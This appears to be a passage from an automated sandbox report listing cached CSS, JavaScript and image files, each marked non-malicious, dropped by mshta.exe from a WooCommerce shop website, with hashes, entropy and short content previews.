                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1706
                                                                                                                                                                                          Entropy (8bit):5.274543201400288
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                          MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                          SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                          SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                          SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\flatsome-shop[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (24156)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):24163
                                                                                                                                                                                          Entropy (8bit):5.0119260774128085
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:/iJ3tWod9MljxJRny8wZyAgaeAsKDVESv4C12fYujmRFOS1tkV0QSYCnF7OX5:/iJ3t569n1EgaLVh12fYujmRFOutkV0M
                                                                                                                                                                                          MD5:77A3EFD7056D250655573B14A61D111E
                                                                                                                                                                                          SHA1:22A4C65BCF6728A849339061E74C4C07D7D136D6
                                                                                                                                                                                          SHA-256:2CAB994EE334C133AC8504B5D0E79F7870DA50590C57DEA956FA76AEBF1562E8
                                                                                                                                                                                          SHA-512:850DC8830CF08AA7A87AA52D8BA1C9B2EE9AA8370A662C131F17A740D18F839AE3E610A05BFB9C01BA6748C7E1FC5A519C276339F11F4BFF72669B755E069592
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:@charset "utf-8";.widget_shopping_cart_content .blockUI.blockOverlay,.woocommerce-checkout-review-order .blockUI.blockOverlay{background-color:#fff!important;opacity:.6!important}.widget_shopping_cart_content .blockUI.blockOverlay:before,.woocommerce-checkout-review-order .blockUI.blockOverlay:before{animation:spin .6s linear infinite;border-bottom:3px solid rgba(0,0,0,.1)!important;border-left:3px solid #446084;border-radius:50%;border-right:3px solid rgba(0,0,0,.1)!important;border-top:3px solid rgba(0,0,0,.1)!important;content:"";display:block;font-size:2em;height:30px;left:50%;line-height:1;margin-left:-.5em;margin-top:-.5em;pointer-events:none;position:absolute;text-align:center;top:50%;width:30px}.category-page-row{padding-top:30px}.price_slider_amount input{display:none}.woocommerce-result-count{display:inline-block;margin:0 1em 0 auto}.woocommerce-ordering,.woocommerce-ordering select{display:inline-block;margin:5px 0}.add_to_cart_button.added{display:none}a.added_to_cart{displ

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\front[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):483
                                                                                                                                                                                          Entropy (8bit):4.579362963972393
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:YEc1tbaLTTJtWcvtVwkctscvTxmtYLMgfBtefjo2Wcd:ItbaLTdtNlVwpt/NmtoJtEo+
                                                                                                                                                                                          MD5:19B11476F82CF3193C6F110B2D6492A9
                                                                                                                                                                                          SHA1:A2809C952F3427460F0DB3A35797233E3CC39455
                                                                                                                                                                                          SHA-256:AF757130511C89FBD953546E53CE3D3DFA9F21C674B81F77B72D0EBFAE872533
                                                                                                                                                                                          SHA-512:0FFF452A8643F2BA62AB5D983668BD08ADD783823C4C1E45CF4E22822500619DF7E37FDF2CD8696F98C89504BBE1BDB5E0DAB3A939EC2E198A7E3E50C1A8DCDB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_list_sd .woof_open_hidden_li{. width: 100%;.}...woof-sd-ie .woof-sd-ie-count:empty{. display: none !important;.}...woof-sd-ie .woof-sd-list-opener{. line-height: 0;. position: relative;. top: -1px;.}...woof-sd-ie woof-sd-list-opener{. top: -2px;. position: relative;.}...woof-sd-ie .woof_childs_list_opener span{. width: 18px;. height: 18px;.}...woof-sd-ie .woof_radio_term_reset_visible{. position: absolute;. right: -9px;. top: -11px;.}...

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\label[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1256
                                                                                                                                                                                          Entropy (8bit):4.699585940208305
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:h5lqUBSydDF8yF9OyeDVjtokvMuTuSSi791GZs+Scirpvw7RSevMuW:h5ly6vOrDVh96SR7GXVRR9W
                                                                                                                                                                                          MD5:9F98A7262163D20AEDC73AFBAC70DCEA
                                                                                                                                                                                          SHA1:D8B963AB148CDA48ABB4D2D379BD72737C40E089
                                                                                                                                                                                          SHA-256:093B42292C864BA77AA5523A73EC87D2690D387FFE7F721BD679860C45902727
                                                                                                                                                                                          SHA-512:5386927FBCFAB47F049FEFCA6F278EA50503A79F79AAF1BC563C1C9F25B9ABA0AD10BDDAF598ACA1F831E9FE5EB358489F927DE20C1300F28A72A7F5B87BD49B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked {. background-color: #34495e;. border-color: #34495e;.}....woof_list_label li {. display: inline-block !important;. margin: 2px;. vertical-align: top;.}...woof_list_label .woof_label_term.{. background-color: #efefef;. border: 1px solid #ddd;. margin: 3px 3px 3px 0;. padding: 3px 4px;. . line-height: 25px;. text-align: center;. overflow: hidden;. text-decoration: none;. cursor: pointer;.. min-width: 50px;. max-width: 100%;. height: 50px;. display: flex;. justify-content: center;. align-items: center;.}...woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked.{. background-color: #477bff;. border-color: #477bff;. color: #fff;.}...woof_label_count{. font-size: 10px;. position: absolute;. border-radius: 200px;. min-width: 17px;. height: 17px;. line-height: 17px !important;. color

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\radio[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9373
                                                                                                                                                                                          Entropy (8bit):4.700452000634185
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:FQjHDwAReCwQng7IdvaeeBoRtE53wyFKd9R8:FQxEhKd9K
                                                                                                                                                                                          MD5:060DF3EBD0E2F510078B7AD314F23392
                                                                                                                                                                                          SHA1:93F2663AFB0D4BC2B8009C275F5FBBC6D2F98977
                                                                                                                                                                                          SHA-256:42A3E44E8259E2CEE8F5853D133FAADCDC8C4D0D6A871EDA9C9C7462C799CFD1
                                                                                                                                                                                          SHA-512:C34E3172A972750DF2186BEF0C56CAEAD50CA5D5233CD57F4563DAC832BA6D730DC0258A8BFBF59A0F492C10EC38D94720B0A405D23C69C129ECB2917C7AFF14
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::root {. --woof-sd-ie-rad_width: 25px;. --woof-sd-ie-rad_height: 25px;.. --woof-sd-ie-rad_space: 1px;. --woof-sd-ie-rad_space_color: #ffffff;.. --woof-sd-ie-rad_text_top: 0;. --woof-sd-ie-rad_text_color: #6d6d6d;. --woof-sd-ie-rad_hover_text_color: #333333;. --woof-sd-ie-rad_selected_text_color: #000000;. --woof-sd-ie-rad_font_size: 14px;. --woof-sd-ie-rad_font_family: inherit;. --woof-sd-ie-rad_font_weight: 400;. --woof-sd-ie-rad_hover_font_weight: 400;. --woof-sd-ie-rad_selected_font_weight: 400;. --woof-sd-ie-rad_line_height: 18px;... --woof-sd-ie-rad_color: #ffffff;. --woof-sd-ie-rad_hover_color: #79b8ff;. --woof-sd-ie-rad_selected_color: #79b8ff;. --woof-sd-ie-rad_image: url();. --woof-sd-ie-rad_selected_image: url();. --woof-sd-ie-rad_hover_image: url();. --woof-sd-ie-rad_hover_scale: 100;. --woof-sd-ie-rad_selected_scale: 100;.. --woof-sd-ie-rad_border_radius: 50%;. --woof-sd-ie-rad_border_width: 1px;. --

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\styles[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2859
                                                                                                                                                                                          Entropy (8bit):5.128976775297061
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkwEv4Hm6Hid:HC+2/Vpb/flue1pFwEv4Hmo0
                                                                                                                                                                                          MD5:0E4A098F3F6E3FAEDE64DB8B9DA80BA2
                                                                                                                                                                                          SHA1:65B9B3C849F3FBDD783DDBFB183616FF55C7EE53
                                                                                                                                                                                          SHA-256:AB21762C3F447AA08CBEFD5EA3866165F925BD5058A9AE19E23721462DE6FB60
                                                                                                                                                                                          SHA-512:47CF04B377C4D5D512EE93439D17D21F6E0C5011E3CDC9EBE2835C91B6BFE7D5B3E4E23DD8C00017D7B235D08A8524A103EDF3A199C8B1D5CB9A182D8D5EAE73
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\by_instock[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                          Entropy (8bit):4.508263568166706
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:l4GiM0XwHRp8Y3:jiM/+Y3
                                                                                                                                                                                          MD5:42ADACE676F5AABC801213B68DD2F459
                                                                                                                                                                                          SHA1:79676A1B58DDFBDC18EDED38B5FD608B4AA9A81F
                                                                                                                                                                                          SHA-256:C277FE3B68AD507BA99939F981BAAC6ADE7850FABDAAFF0ACE5334C5A8268700
                                                                                                                                                                                          SHA-512:41754E6D9D8A5EA882C22BDA32C9F717433F2ECA7DCC09C9FC50F4EB096A1221202C7DCBE0927D792AB93BB74BE172F19EC932B8DFE085A6F39F493DE8BF4BDB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_checkbox_instock_container{. margin-bottom: 4px;.}..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\chosen.min[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (372)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9765
                                                                                                                                                                                          Entropy (8bit):4.814774684621602
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:O/OjL3rn7jkJjYQw2HXlcIQCK0HTpNvYY6oRWYmi90Q:HN42YLR
                                                                                                                                                                                          MD5:72E9B866AC4B28674A41F8535A512CCA
                                                                                                                                                                                          SHA1:33CF8115AA16B4F6AA2C28494DBD5126839E80C0
                                                                                                                                                                                          SHA-256:EA2B40344A11F515E346ED0622BFF12600F3CF80C35D02C538C9CE72E1E5F9EB
                                                                                                                                                                                          SHA-512:EA5C3FD755F6A0E8B8F293847ADECFDE25876E97D76209235C097110309DB7F53253AD090D5EC5134EC96498CD60559F6D4CA497CE54191399B346FFC8F217CF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.chosen-container{. position:relative;. display:inline-block;. vertical-align:middle;. font-size:13px;. user-select:none.}..chosen-container *{. box-sizing:border-box.}..chosen-container .chosen-drop{. position:absolute;. top:100%;. z-index:1010;. width:100%;. border:1px solid #aaa;. border-top:0;. background:#fff;. clip:rect(0,0,0,0);. clip-path:inset(100% 100%).}..chosen-container.chosen-with-drop .chosen-drop{. clip:auto;. clip-path:none.}..chosen-container a{. cursor:pointer.}..chosen-container .chosen-single .group-name,.chosen-container .search-choice .group-name{. ma

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\customize-table[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):89
                                                                                                                                                                                          Entropy (8bit):4.478408999166407
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:ngCLczw62mCFAsRpfFPKNY+xevYn:PLckGGAwDy++xevYn
                                                                                                                                                                                          MD5:B33E17B48C6E4127F08FF901EDC1A3A0
                                                                                                                                                                                          SHA1:50041C79EC0C509CB8E2A0F207FC5955F86C4F1C
                                                                                                                                                                                          SHA-256:6B7C982887D1C9CD6B5CAC280423EE79929023FA26E8EB440EF99CFF7411813E
                                                                                                                                                                                          SHA-512:CFEA6F2422FC556133BE1038ECEC88B61129FCBC978CDE4DF79377D1C0AA320768E6C4B25564547A494B48AB1C100CB8DA9830A733804A2A663853133B969CED
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.awdr_discount_bar{. padding: 10px;. margin-bottom: 10px;. border-radius: 4px;.}

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gtm4wp-contact-form-7-tracker[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):891
                                                                                                                                                                                          Entropy (8bit):5.005287833752577
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:zrgSxFWNO661S9goFMhYK376QgoFMYOnRrjNd9W:Zx4A66ob076Qb2nR/b9W
                                                                                                                                                                                          MD5:896AA74695421759DE3F05A1AC46B4B1
                                                                                                                                                                                          SHA1:4648CA7E1CABF2F952D6EE68431F54A14571E552
                                                                                                                                                                                          SHA-256:9FBA7D93DD3ACEF0467892543BA93147B67CF105757CA84108FE3DD63DE4C4C5
                                                                                                                                                                                          SHA-512:391D329BD2CA785D9109A5EA6EAF04578F3F39B58A17B58611A9ED7F84F0CCB12352B83120BFD83DAA8468906718DEACFE10975CF8278899EECC3444469AFA07
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:jQuery( function() {...jQuery( ".wpcf7" ).....on( 'wpcf7mailsent', function( e ) {.....var gtm4wp_cf7formid = '(not set)';.....if ( e && e.detail && e.detail.contactFormId ) {......gtm4wp_cf7formid = e.detail.contactFormId;.....} else if ( e && e.originalEvent && e.originalEvent.detail && e.originalEvent.detail.contactFormId ) {......gtm4wp_cf7formid = e.originalEvent.detail.contactFormId;.....}.......var gtm4wp_cf7forminputs = [];.....if ( e && e.detail && e.detail.inputs ) {......gtm4wp_cf7forminputs = e.detail.inputs;.....} else if ( e && e.originalEvent && e.originalEvent.detail && e.originalEvent.detail.inputs ) {......gtm4wp_cf7forminputs = e.originalEvent.detail.inputs;.....}.......window[ gtm4wp_datalayer_name ].push({......'event': 'gtm4wp.contactForm7Submitted',......'gtm4wp.cf7formid': gtm4wp_cf7formid,......'gtm4wp.cf7inputs': gtm4wp_cf7forminputs.....});....});..});

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\husky[1].js

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):16030
                                                                                                                                                                                          Entropy (8bit):4.051685215025106
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:W0ke5apcLdPUYUbXneMr9of788Lsau540TeKlZJUAs50BtrucvxSiIyhWXi+dMBP:oeoWHUbXvrogasaETeMTSMWST
                                                                                                                                                                                          MD5:CD16E3D0613A69792979AA54E0CE6177
                                                                                                                                                                                          SHA1:631115C445B1098B2A58CC7D7F584051B3A40863
                                                                                                                                                                                          SHA-256:AF3BC439B22149AC67FA17035CE971D9DA6F741985E19151B2057F4DCCACA319
                                                                                                                                                                                          SHA-512:51761C601AF3FDD7ABEC95FD7FA6D0C66D4A93ECA3451C355BCA1DE04A9D15BBF6A8B066E7BACE5C9DA458A2D0D24BB859BA5ADC1BAC29C357A472DE9A38BCBB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:'use strict';..class HuskyText {. constructor(input, data = {}) {. this.searched_value = '';. this.current_page = 0;. this.data = Object.assign({}, data);. this.input = input;. this.init_input();. this.container = document.createElement('div');. this.container.className = 'woof_husky_txt';. this.input.insertAdjacentElement('afterend', this.container);.. this.fetch_timer = null;. this.fetch_controller = null;.. document.addEventListener('click', ev => {. if (ev.target !== this.input) {. this._show(false);. }. });. }.. init_input() {.. Object.keys(this.data).forEach((marker) => {. if (this.input.hasAttribute(`data-${marker}`)) {. this.data[marker] = this.input.getAttribute(`data-${marker}`);. }. });.. this.input.value = this.data.s;. if (!this.input.classList.contains('woof_husky_txt-input')) {.

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\quick_search[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4701
                                                                                                                                                                                          Entropy (8bit):4.845634335865973
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:WB37WJTsD8XHVCNmMK1r4awwF7acYvaHWDFl2FJmzecjgc+roxZEFyF5GB:W90I0VCNmMK187wF7acYCHWDmFJzJpSu
                                                                                                                                                                                          MD5:2BD8B16C0FA875A954507C9BAF9F5D2C
                                                                                                                                                                                          SHA1:4DA3759AD67F8CDA6B22B9CC6ED154AC48CC78BB
                                                                                                                                                                                          SHA-256:E05898D46696CD63B11C807D05759CE7EF44156135D194BC46F923713F50F7B3
                                                                                                                                                                                          SHA-512:177367D6AAB5A34CAA406CC7B740F915F694A7BA23DEA5458EF569733EADB58FE9DCF56613CEBBF32EF0781EF0184B628B46F1BCD38AAE7608AB713B1E8DF462
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.woof_quick_search_wraper .easy-autocomplete{. width: 100% !important;.}..woof_quick_search_wraper input#woof_quick_search_form{. width: 100%;. min-width: 250px;.}..woof_qt_key_words{. line-height: initial;.}..easy-autocomplete-container .woof_quick_search_desc{. display: inline-block;. vertical-align: top;. width: calc(100% - 70px);. padding-left: 15px;. max-height: 70px;. overflow: hidden;. transition: max-height 0.7s ease-in-out;.}..easy-autocomplete-container .woof_quick_search_img{. display: inline-block;. margin-top: 10px;. width:50px;. height: 50px;.}..woof_quick_search_desc_title{. font-weight: bold;. line-height: initial;. margin-bottom: 20px;.}..easy-autocomplete-container .woof_quick_search_desc:hover {. max-height: 200px;.}./*additional filters*/..woof_qt_item_container{. display: block;. margin-left: 0;. min-width: 80px;.}..woof_qt_radio_reset{. visibility: hidden;.}.div.checked + label .woof_qt_radio_res

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\switcher[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8973
                                                                                                                                                                                          Entropy (8bit):4.788833439160095
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:DFvmFAXkH9W3hMZ6EhtbdtjmGMD/stn9iW:DFOuN4qW
                                                                                                                                                                                          MD5:1AAC01C7120691B8BA37ACD1C67B89F7
                                                                                                                                                                                          SHA1:36BAC4F362EB3B24BFAD500E5AA98DDF61A6BCB5
                                                                                                                                                                                          SHA-256:687A6513B3D91EEA53EC2CA5F6431EE6C8BEB7E6AE53D9259DE7673DE1C7D6C9
                                                                                                                                                                                          SHA-512:C0154A08498EE2AD1DAB67837DF2E49176FE8ACC3294309B7B5E15402873D628F0CA8D54E9D36A95A20E84D3B20A383AAC3726EEBDCB15B505CDF77FCE1200F1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview::root {. --woof-sd-ie-sw_vertex_enabled_bg_color: #79b8ff;. --woof-sd-ie-sw_vertex_enabled_bg_image: url();. --woof-sd-ie-sw_vertex_enabled_border_color: #79b8ff;. --woof-sd-ie-sw_vertex_enabled_border_style: solid;.. --woof-sd-ie-sw_vertex_disabled_bg_color: #ffffff;. --woof-sd-ie-sw_vertex_disabled_bg_image: url();. --woof-sd-ie-sw_vertex_disabled_border_color: #ffffff;. --woof-sd-ie-sw_vertex_disabled_border_style: solid;.. --woof-sd-ie-sw_vertex_border_width: 1px;.. --woof-sd-ie-sw_substrate_enabled_bg_color: #c8e1ff;. --woof-sd-ie-sw_substrate_enabled_bg_image: url();. --woof-sd-ie-sw_substrate_enabled_border_color: #c8e1ff;. --woof-sd-ie-sw_substrate_enabled_border_style: solid;.. --woof-sd-ie-sw_substrate_disabled_bg_color: #9a9999;. --woof-sd-ie-sw_substrate_disabled_bg_image: url();. --woof-sd-ie-sw_substrate_disabled_border_color: #9a9999;. --woof-sd-ie-sw_substrate_disabled_border_style: solid;.. --woof-sd-ie-sw_substrate

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\warning[1]

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1062
                                                                                                                                                                                          Entropy (8bit):4.517838839626174
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                          MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                          SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                          SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                          SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\awdr_style[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1143
                                                                                                                                                                                          Entropy (8bit):4.841850403394578
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:0bcBq95/SyHaTc88bc2ZgH8avmeqDRzxY/JrKThGT2epFMADSTQFHp:xBs5/mTco26HzeDBxYDTH1DJHp
                                                                                                                                                                                          MD5:B0AF44348A08900199107155048211B9
                                                                                                                                                                                          SHA1:97D63FBF5EE0CBE68CD7C8B2D0238DC1456806C1
                                                                                                                                                                                          SHA-256:86298A871666C6F4E59411B98F48F91043AEB724A584F92EF4248DA454955B43
                                                                                                                                                                                          SHA-512:9941B58EC810AB8C3FE70BB0789D6E516777660EDE1DB5F97C3599AEF057E8654A5EEC42617C910E95F6D414427B99145A7DDF8B45C2B09B49AE0605D977C290
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.awdr_free_product_text{. display: inline-block;. padding: 0px 10px;. background-color: #3d9cd2;. color: #fff;. border-radius: 3px;.}..variation-wdr_free_product{. display: none !important;.}..awdr_change_product{. cursor: pointer;.}..awdr_free_product_variants{. padding: 5px;.}..awdr-product-name{. padding-left: 10px;.}..awdr_change_product{. display: flex;.}..awdr-select-free-variant-product-toggle {. color: gray;. cursor: pointer;. width: 100%;. border: none;. text-align: left;. outline: none;. font-size: 1.02em;. transition: 0.4s;.}...awdr-select-free-variant-product-toggle-active, .awdr-select-free-variant-product-toggle:hover {. color: #444;.}...awdr-select-variant-product {. padding: 0 18px;. display: none;. background-color: white;. overflow: hidden;.}..awdr-select-free-variant-product-toggle:after {. content: '\02795'; /* Unicode character for "plus" sign (+) */. font-size: 12px;. color: #777;. ma

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\by_author[1].css

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):163
                                                                                                                                                                                          Entropy (8bit):4.479414044196935
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:lPnJMelF+dcMoCJ+bRJpmMo7cmKY6PeTv1oCVo62nTo7n:pCwF+dToCqReMoQpeTv1oCOzo7
                                                                                                                                                                                          MD5:B1659E76506F38E0B7B3A02016C30508
                                                                                                                                                                                          SHA1:D7DDC9D8CC5385AEB75E90CD0E052DCE2D0D2517
                                                                                                                                                                                          SHA-256:01B17E190F4E0FAECD59F2A30B4760B083A27B5546BA0672C6586D7C99531DD5
